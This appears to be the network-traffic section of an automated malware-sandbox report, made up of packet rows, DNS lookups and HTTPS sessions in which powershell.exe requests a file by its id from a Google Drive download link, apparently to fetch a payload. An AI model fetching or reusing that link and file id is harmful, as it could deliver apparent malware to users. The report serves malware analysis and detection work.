                                                                                  Mar 10, 2025 09:20:25.101396084 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.101536036 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.101572037 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.103075981 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.103132010 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.103137970 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.103173018 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.103240013 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.103280067 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.103285074 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.103332043 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.103334904 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.103379011 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.104623079 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.104661942 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.104667902 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.104728937 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.106596947 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.106647968 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.106744051 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.106789112 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.107846022 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.107887983 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.107893944 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.107923031 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.109317064 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.109400988 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.109440088 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.109477997 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.110626936 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.110668898 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.110673904 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.110734940 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.111862898 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.111987114 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.111990929 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.112055063 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.112119913 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.112159967 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.112163067 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.112199068 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.114929914 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.114993095 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.115008116 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.115046024 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.115050077 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.115065098 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.115082979 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.115130901 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.118346930 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.118449926 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.118464947 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.118505001 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.120398998 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.120445967 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.120461941 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.120501995 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.121815920 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.121875048 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.121959925 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.121995926 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125276089 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125334024 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125432014 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125468969 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125484943 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125525951 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125593901 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125633955 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.125642061 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.125686884 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.128724098 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.128771067 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.128777027 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.128812075 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.128834963 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.128869057 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.128879070 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.128916979 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.129071951 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.129115105 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.137902975 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.138076067 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.138093948 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.138149977 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.138180971 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.138217926 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.138258934 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.138329983 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.138335943 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.138437986 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.144295931 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.144373894 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.144443035 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.144515991 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.144522905 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.144570112 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.144572973 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.144578934 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.144602060 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.144634008 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.144639015 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.144745111 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.147547007 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.147625923 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.147753954 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.147797108 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.147922993 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.147988081 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.148005009 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.148010969 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.148025990 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.148061991 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.148066998 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.148166895 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.154978037 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.155034065 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.155133963 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.155174017 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.155189037 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.155220985 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.155606031 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.155698061 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.155702114 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.155853987 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.155857086 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.155956984 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.162887096 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.162991047 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.163001060 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.163094997 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.163113117 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.163125038 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.163158894 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.163321972 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.163326025 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.163496017 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.165256023 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.165380001 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.165453911 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.165538073 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.165549994 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.165648937 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.165666103 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.165673971 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.165776014 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.165781021 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.165879965 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.168730021 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.168857098 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.168915987 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.168984890 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.168998957 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.169007063 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.169106960 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.169114113 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.169189930 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.169200897 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.169409990 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.177011967 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.177114964 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.177139044 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.177170992 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.177177906 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.177206993 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.177275896 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.177316904 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.177510023 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.177515984 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.177577019 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.188405991 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.188524008 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.188771009 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.188894987 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.188901901 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.188977003 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.189032078 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.189084053 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.189104080 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.189116955 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.189213037 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.191894054 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.191930056 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.191965103 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.191987038 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.191993952 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.192097902 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.192102909 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.192181110 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.192186117 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.192245960 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.194046021 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.194123983 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.194132090 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.194178104 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.194227934 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.194266081 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.194282055 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.194288969 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.194305897 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.194369078 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.194374084 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.194524050 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.195074081 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.195118904 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.195142031 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.195193052 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.195352077 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.195391893 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.195401907 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.195410013 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.195436001 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.195466042 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.195511103 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.195600986 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.198846102 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.199004889 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.199161053 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.199208975 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.199213028 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.199220896 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.199270010 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.199270010 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.199276924 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.199321985 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.199415922 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.199474096 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.203299046 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.203385115 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.203422070 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.203461885 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.203484058 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.203491926 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.203578949 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.203869104 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.203936100 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.203953028 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.204057932 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.209759951 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.209832907 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.209847927 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.209856987 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.209882021 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.209928036 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.209937096 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.210012913 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.210052967 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.210125923 CET44349698142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:20:25.210136890 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.210273981 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.210442066 CET49698443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:20:25.210467100 CET44349698142.250.185.97192.168.2.6

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Mar 10, 2025 09:18:58.998698950 CET6445753192.168.2.61.1.1.1
                                                                                  Mar 10, 2025 09:18:59.007714033 CET53644571.1.1.1192.168.2.6
                                                                                  Mar 10, 2025 09:19:01.726605892 CET5919553192.168.2.61.1.1.1
                                                                                  Mar 10, 2025 09:19:01.734880924 CET53591951.1.1.1192.168.2.6
                                                                                  Mar 10, 2025 09:19:04.434381962 CET5686453192.168.2.61.1.1.1
                                                                                  Mar 10, 2025 09:19:04.441967010 CET53568641.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Mar 10, 2025 09:18:58.998698950 CET192.168.2.61.1.1.10x96c3Standard query (0)Host_6637.6637.6637.657eA (IP address)IN (0x0001)false
                                                                                  Mar 10, 2025 09:19:01.726605892 CET192.168.2.61.1.1.10x8626Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                  Mar 10, 2025 09:19:04.434381962 CET192.168.2.61.1.1.10xc717Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Mar 10, 2025 09:18:57.477193117 CET1.1.1.1192.168.2.60x8ecfNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                  Mar 10, 2025 09:18:57.477193117 CET1.1.1.1192.168.2.60x8ecfNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                  Mar 10, 2025 09:18:59.007714033 CET1.1.1.1192.168.2.60x96c3Name error (3)Host_6637.6637.6637.657enonenoneA (IP address)IN (0x0001)false
                                                                                  Mar 10, 2025 09:19:01.734880924 CET1.1.1.1192.168.2.60x8626No error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                  Mar 10, 2025 09:19:04.441967010 CET1.1.1.1192.168.2.60xc717No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • drive.google.com
                                                                                  • drive.usercontent.google.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649688216.58.212.1744437424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-03-10 08:19:03 UTC215OUTGET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                  Host: drive.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2025-03-10 08:19:04 UTC1610INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:19:04 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-GpFBnqHciDUgwDF5L091kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649689216.58.212.1744437424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-03-10 08:19:10 UTC97OUTGET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1
                                                                                  Host: drive.google.com
                                                                                  2025-03-10 08:19:11 UTC1319INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Mon, 10 Mar 2025 08:19:10 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-odL5SafZupnfXuVMGHYlEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
